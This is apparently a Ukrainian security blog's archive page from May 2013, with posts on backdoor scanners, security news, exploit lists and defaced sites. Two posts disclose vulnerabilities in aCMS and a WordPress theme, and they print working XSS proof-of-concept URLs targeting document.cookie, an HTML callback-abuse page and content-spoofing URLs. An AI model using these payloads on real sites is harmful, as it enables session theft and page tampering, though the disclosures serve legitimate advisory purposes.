Архів за Травень, 2013

Тестування сканерів бекдорів

23:50 25.05.2013

Пропоную ознайомитися з мою статтею про тестування різних сканерів бекдорів на веб сайтах, що я провів на цьому тижні.

В даному дослідженні перевірялися плагіни для WordPress, що вміють виявляти бекдори (а деякі плагіни й інший шкідливий код). Кожен з цих плагінів може застосовуватися (з різною ефективністю) для виявлення бекдорів та інших слідів взлому сайта. Тема бекдорів веб сайтів, в тому числі на таких движках як WordPress, зараз є дуже актуальною і всім користувачам Інтернет буде корисно дізнатися про існуючі системи.

Тестування сканерів бекдорів серед плагінів для WordPress

Мною були дослідженні наступні сканери:

1. WordPress Exploit Scanner (дві версії).
2. Belavir.
3. AntiVirus for WordPress.
4. WordPress File Monitor.

З результатами тестування можете ознайомитися в даній статті.

Уразливості в aCMS

22:27 25.05.2013

05.04.2013

У лютому, 20.02.2013, я знайшов Cross-Site Scripting, Content Spoofing та Information Leakage уразливості в aCMS. Про що вже повідомив розробникам системи.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам.

25.05.2013

Cross-Site Scripting (WASC-08):

Для ZeroClipboard10.swf можливі XSS через параметр id та XSS через копіювання атакуючого коду в буфер обміну.

http://site/assets/swf/ZeroClipboard10.swf?id=%22))}catch(e){}if(!self.a)self.a=!alert(document.cookie)//&width&height
http://site/assets/swf/tagcloud.swf?mode=tags&tagcloud=%3Ctags%3E%3Ca+href=%27javascript:alert(document.cookie)%27+style=%27font-size:+40pt%27%3EClick%20me%3C/a%3E%3C/tags%3E

Content Spoofing (WASC-12):

Можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті.

http://site/assets/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv
http://site/assets/js/tiny_mce/plugins/media/img/flv_player.swf?autoStart=false&startImage=http://site2/1.jpg
http://site/assets/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.flv&autoStart=false&startImage=http://site2/1.jpg
http://site/assets/js/tiny_mce/plugins/media/img/flv_player.swf?flvToPlay=http://site2/1.xml

Через xml-файл, розміщений на поточному чи зовнішньому ресурсі, можна вказувати абсолютні URL для включення зовнішніх файлів в флешку на цільовому сайті (параметри thumbnail та url в xml-файлі приймають довільні адреси).

Файл 1.xml:

<?xml version="1.0" encoding="UTF-8"?>
<playlist>
	<item name="Content Spoofing" thumbnail="1.jpg" url="1.flv"/>
	<item name="Content Spoofing" thumbnail="2.jpg" url="2.flv"/>
</playlist>

Cross-Site Scripting (WASC-08):

<html>
<body>
<script>
function flvStart() {
	alert('XSS');
}
function flvEnd() {
	alert('XSS');
}
</script>
<object width="50%" height="50%">
<param name=movie value="flv_player.swf?flvToPlay=1.flv&jsCallback=true">
<param name=quality value=high>
<embed src="flv_player.swf?flvToPlay=1.flv&jsCallback=true" width="50%" height="50%" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash"></embed>
</object>
</body>
</html>

Якщо на сайті на сторінці з flv_player.swf (з параметром jsCallback=true, або якщо є можливість вказати цей параметр для flv_player.swf) є можливість включити JS код з функцією flvStart() і/або flvEnd() (через HTML Injection), то можна провести XSS атаку. Тобто JS-калбеки можна використати для XSS атаки.

Information Leakage (WASC-13):

http://site/assets/1

На сторінці з 404 помилкою мають місце Source Code Disclosure, Full Path Disclosure і виведення списку файлів та іншої інформації.

Вразливі aCMS 1.0 та попередні версії.

Новини: статистика по ботнету Carna, Apache mod_rewrite та взлом емайлів

20:33 25.05.2013

За повідомленням www.xakep.ru, статистика по ботнету Carna.

Аналітик в області інформаційної безпеки Парт Шукла для конференції AusCERT підготував цікаву презентацію, присвячену ботнету Carna. Нагадаю, що саме за допомогою цього глобального ботнета був здійснений найбільший скан Інтернету в наукових цілях - Internet Census 2012.

Про сканування портів всіх IPv4 адрес я вже писав. За десять місяців 2012 року були проскановані всі IP-адреса в адресному просторі IPv4 за допомогою більше 420 тисяч незахищених пристроїв. Для вищезгаданої презентації по ботнету Crana автор добув прямо в анонімного хакера базу з 1,2 млн. уразливих пристроїв в Інтернеті, 30% яких у свій час увійшли в ботнет Carna і використовувалися для здійснення глобального скана.

За повідомленням www.opennet.ru, незвичайна уразливість в Apache mod_rewrite.

У модулі mod_rewrite популярного веб сервера Apache серії 2.2.x виявлена цікава уразливість, що дозволяє віддаленому зловмиснику виконати довільну команду в момент перегляду лог-файла адміністратором сервера.

Уразливість обумовлена тим фактом, що mod_rewrite при записі в лог-файл не екранує спеціальні символи, що дозволяє віддаленому зловмиснику, за допомогою спеціально оформлених запитів до веб сервера, записати туди, наприклад, керуючі послідовності для термінала.

До речі, в nginx подібна уразливість була знайдена в 2009 році. А тепер і в Apache mod_rewrite. Виконання системних команд через логи це дуже популярна функція у розробників веб серверів :-) .

За повідомленням www.xakep.ru, Нью-Йоркський поліцейський взламував емайли колег.

Эдвін Варгас, детектив міської поліції Нью-Йорка в Бронксі, був арештований за обвинуваченням у комп’ютерних злочинах. Відповідно до обвинувачення, протягом двох років Варгас займався нелегальним взломом чужих електронних поштових скриньок.

Що характерно, для виконання брудної роботи Варгас найняв приватну фірму, у якої в зазначений період часу замовив доступ до 43 поштових аккаунтів, що належать 30 користувачам. Серед яких, зокрема, були 19 чоловік з поліцейського департаменту, в тому числі інші детективи.

Добірка експлоітів

17:06 25.05.2013

В даній добірці експлоіти в веб додатках:

  • D-Link DSL-2740B Authentication Bypass Vulnerability (деталі)
  • D-Link DIR-645 Authentication Bypass Vulnerability (деталі)
  • Nginx HTTP Server 1.3.9-1.4.0 Chunked Encoding Stack Buffer Overflow (деталі)
  • httpdx 1.5.5 Denial of Service (деталі)
  • PHP 6.0 openssl_verify() Local Buffer Overflow PoC (деталі)

Травневий вівторок патчів від Microsoft

22:46 24.05.2013

У травні місяці Microsoft випустила 10 патчів. Що більше ніж у квітні.

У травневому “вівторку патчів” Microsoft випустила черговий пакет оновлень, до якого увійшло 10 бюлетенів по безпеці. Що закривають 33 уразливості в програмних продуктах компанії. Два патчі закривають критичні уразливості (всі вони стосуються Internet Explorer) та вісім патчів закривають важливі уразливості.

Дані патчі стосуються всіх поточних операційних систем компанії Microsoft - Windows XP, 2003, Vista, 2008, 7, 2008 R2, 8, 2012, RT. А також Microsoft Office, Internet Explorer, .NET Framework, Communicator, Lync, Lync Server та Windows Essentials.

Вийшли PHP 5.3.25 та PHP 5.4.15

20:09 24.05.2013

У травні, 09.05.2013, вийшли PHP 5.3.25 та PHP 5.4.15. В яких виправлено біля 10 багів. Дані релізи направлені на покращення стабільності гілок 5.3.x і 5.4.x.

Жодних уразливостей в цих версіях PHP виправлено не було. Лише згадується оновлення бібліотеки libmagic.

По матеріалам http://www.php.net.

Добірка уразливостей

17:26 24.05.2013

В даній добірці уразливості в веб додатках:

  • RSA NetWitness Informer Cross-Site Request Forgery and Click-jacking Vulnerabilities (деталі)
  • Reflected XSS in phpMyAdmin 3.5.7 (деталі)
  • security advisory: AirDroid 1.0.4 beta (деталі)
  • Multiple vulnerabilities in Open-Xchange (деталі)
  • FortiGate FortiDB 2kB 1kC & 400B - Cross Site Vulnerability (деталі)
  • Multiple Vulnerabilities in KrisonAV CMS (деталі)
  • FortiWeb 4kC,3kC,1kC & VA - Cross Site Vulnerabilities (деталі)
  • Multiple vulnerabilities in Sosci Survey (деталі)
  • HP OpenVMS LOGIN or ACMELOGIN, Remote or Local Denial of Service (DoS) (деталі)
  • Matrix42 Service Desk XSS (деталі)

XSS та FPD уразливості в темі I Love It New для WordPress

23:55 23.05.2013

У травні, 16.05.2013, я виявив Cross-Site Scripting та Full path disclosure уразливості в темі I Love It New для WordPress. Про що найближчим часом повідомлю розробникам.

Дана тема містить вразливі версії VideoJS та Audio Player. Раніше я писав про уразливості в VideoJS.

Cross-Site Scripting (WASC-08):

http://site/wp-content/themes/iloveitnew/videojs/videojs/video-js.swf?readyFunction=alert(document.cookie)
http://site/wp-content/themes/iloveitnew/lib/php/assets/player.swf?playerID=%22))}catch(e){alert(document.cookie)}//

Full path disclosure (WASC-13):

FPD уразливості є в index.php та майже в усіх інших php-файлах (в папці та підпапках).

http://site/wp-content/themes/iloveitnew/

http://site/wp-content/themes/iloveitnew/videojs/video-js.php

http://site/wp-content/themes/iloveitnew/videojs/admin.php

Вразливі всі версії теми I Love It New для WordPress.

Фазінг онлайнових ігор

22:48 23.05.2013

Продовжуючи розпочату традицію, після попереднього відео про виконання коду в Mozilla Firefox, пропоную нове відео на веб секюріті тематику. Цього разу відео про фазінг онлайнових ігор. Рекомендую подивитися всім хто цікавиться цією темою.

DEFCON 20: Fuzzing Online Games

Торік на конференції DEFCON 20 відбувся виступ Elie Bursztein та Patrick Samy. В своєму виступі вони розповіли про фазінг онлайнових ігор, коли проводиться аналіз ігор, про внутрішню структуру яких нічого невідомо, шляхом відправлення спеціальних даних з метою виявлення уразливостей. Немає сумнів, що онлайнові ігри мають уразливості, які можуть бути використані для різних атак, зокрема фінансового характеру (як то для збільшення внутрішньо ігрової валюти, яку нерідко можна конвертувати в реальні гроші).

Вони розповіли про власні розробки для фазінга онлайнових ігор. Рекомендую подивитися дане відео для розуміння сучасних атак на Інтернет ігри.

Похакані сайти №227

20:16 23.05.2013

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://kakhovka-rada.gov.ua (хакером Hmei7) - 11.03.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://pereyaslav-rda.gov.ua (хакером Hmei7) - 12.03.2013 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://fish-spa.rv.ua (хакерами з 3xp1r3 Cyber Army)
  • http://bigdruk.com (хакером ABO-SHOSHAH) - 13.04.2013, зараз сайт вже виправлений адмінами
  • http://artdecojugendstil.com (хакером ABO-SHOSHAH) - 13.04.2013, зараз сайт вже виправлений адмінами